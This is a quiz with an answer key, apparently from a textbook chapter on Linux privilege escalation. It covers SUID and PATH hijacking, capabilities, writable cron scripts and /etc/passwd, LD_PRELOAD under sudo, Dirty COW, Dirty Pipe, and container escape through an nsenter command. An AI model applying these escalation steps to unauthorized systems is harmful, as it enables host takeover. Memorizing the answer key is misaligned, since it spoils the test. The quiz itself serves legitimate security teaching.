Chapter 15 Quiz: Linux Exploitation and Privilege Escalation

Test your understanding of Linux privilege escalation techniques, tools, and defensive measures.

1. When a binary has the SUID bit set and is owned by root, what happens when a regular user executes it?

A) The binary runs with the permissions of the user who executed it B) The binary runs with root permissions regardless of who executed it C) The binary prompts for the root password before execution D) The binary runs in a sandbox with restricted permissions

2. You discover a SUID binary at /usr/local/bin/backup-tool. Running strings on it reveals it calls tar without an absolute path. What attack technique is applicable?

A) Buffer overflow exploitation B) PATH hijacking C) Kernel exploitation D) LD_PRELOAD injection

3. Which Linux capability, if assigned to a Python binary, allows direct privilege escalation to root?

A) cap_net_raw B) cap_net_bind_service C) cap_setuid D) cap_sys_time

4. What is the primary purpose of the pspy tool in privilege escalation enumeration?

A) Scanning for kernel vulnerabilities B) Monitoring processes without root privileges to discover hidden cron jobs C) Brute-forcing SSH credentials D) Exploiting SUID binaries

5. In the context of Dirty COW (CVE-2016-5195), what type of vulnerability is being exploited?

A) Buffer overflow in a SUID binary B) Race condition in the kernel's copy-on-write mechanism C) SQL injection in a web application running as root D) Misconfigured sudo permissions

6. A cron job runs * * * * * root /opt/scripts/cleanup.sh and the script is world-writable. What is the most straightforward exploitation method?

A) Modify the cron schedule to run more frequently B) Append a reverse shell command to the script C) Replace the cron daemon with a malicious version D) Exploit the cron service itself

7. What does the following command search for?

find / -perm -4000 -type f 2>/dev/null

A) Files modified in the last 4000 seconds B) Files larger than 4000 bytes C) Files with the SUID bit set D) Files owned by UID 4000

8. You find that /etc/passwd is writable by your user. What is the fastest path to root?

A) Delete the root account entry B) Add a new user with UID 0 and a known password hash C) Change the root user's shell to /bin/false D) Modify the permissions of /etc/shadow through /etc/passwd

9. Which of the following indicates you are running inside a Docker container?

A) The file /etc/docker.conf exists B) The file /.dockerenv exists C) The kernel version contains "docker" D) The hostname is always "docker-host"

10. What is the critical difference between a privileged Docker container and a standard container from a security perspective?

A) Privileged containers have network access; standard containers do not B) Privileged containers have all Linux capabilities and can access host devices C) Privileged containers can only run as the root user D) Privileged containers use a different Linux kernel

11. In LinPEAS output, what does a "Red/Yellow (95% PE vector)" color coding indicate?

A) The finding is informational and requires no action B) The finding is almost certainly a privilege escalation path C) The finding relates to network configuration D) The finding is a false positive

12. A custom SUID binary calls system("service apache2 status"). The service command is called without its absolute path. To exploit this via PATH hijacking, you would:

A) Modify the real service binary at /usr/sbin/service B) Create a malicious service script in a directory that appears earlier in the PATH C) Recompile the SUID binary with a different command D) Change the Apache configuration to escalate privileges

13. What security mechanism in Linux provides Mandatory Access Control that can restrict processes even when running as root?

A) Standard file permissions (rwx) B) SUID/SGID bits C) SELinux or AppArmor D) The sudo mechanism

14. You have found that LD_PRELOAD is preserved in the sudoers configuration (Defaults env_keep += "LD_PRELOAD"). How can this be exploited?

A) Use LD_PRELOAD to load a malicious shared library when executing any allowed sudo command B) Modify the LD_PRELOAD variable to point to the kernel C) Use LD_PRELOAD to bypass SELinux policies D) LD_PRELOAD only works with interpreted languages, not compiled binaries

15. Which of the following is the recommended order for attempting privilege escalation vectors (from safest to riskiest)?

A) Kernel exploits -> SUID binaries -> Cron jobs -> Sudo misconfigs B) Sudo misconfigs -> SUID/capabilities -> Cron/PATH hijacking -> Kernel exploits C) Container escapes -> Kernel exploits -> Network attacks -> Social engineering D) Automated tools -> Manual enumeration -> Kernel exploits -> Physical access

16. The Dirty Pipe vulnerability (CVE-2022-0847) allows an attacker to:

A) Escalate privileges through a buffer overflow in the SSH daemon B) Overwrite data in read-only files by exploiting the pipe mechanism C) Inject code into running Docker containers D) Bypass firewall rules through raw socket manipulation

17. Which tool provides a curated database of Unix binaries that can be exploited for privilege escalation when they have SUID or sudo access?

A) Metasploit B) Nmap C) GTFOBins D) Burp Suite

18. In a Kubernetes pod, what must you typically use to escape to the host if the pod has hostPID: true?

A) Docker socket access B) nsenter targeting PID 1 to enter the host's namespace C) Mounting the host filesystem via NFS D) Exploiting the Kubernetes API

Answer Key

  1. B - SUID causes the binary to execute with the file owner's permissions (root in this case).
  2. B - PATH hijacking exploits unqualified command calls by placing malicious binaries earlier in PATH.
  3. C - cap_setuid allows the process to call setuid(0) to become root.
  4. B - pspy monitors process creation in real-time to discover scheduled tasks without needing root.
  5. B - Dirty COW exploits a race condition in the kernel's copy-on-write memory mechanism.
  6. B - Appending commands to a world-writable script that runs as root is the direct exploitation path.
  7. C - -perm -4000 matches files with the SUID bit (4000 in octal) set.
  8. B - Adding a UID 0 user with a known password hash gives immediate root access via su.
  9. B - The /.dockerenv file is a standard Docker indicator.
  10. B - Privileged containers have all capabilities and can access host devices, making escape trivial.
  11. B - This color indicates a nearly certain privilege escalation vector.
  12. B - Creating a malicious service in a PATH directory that is searched before /usr/sbin/.
  13. C - SELinux and AppArmor implement MAC that restricts even root processes.
  14. A - LD_PRELOAD injects a shared library into the process started by sudo, running as root.
  15. B - Start with misconfigurations (safe, stable) and escalate to kernel exploits (risky) as last resort.
  16. B - Dirty Pipe allows overwriting read-only file data through the pipe buffer mechanism.
  17. C - GTFOBins is the definitive reference for exploitable Unix binaries.
  18. B - With hostPID, nsenter --target 1 --mount --uts --ipc --net --pid bash enters the host namespace.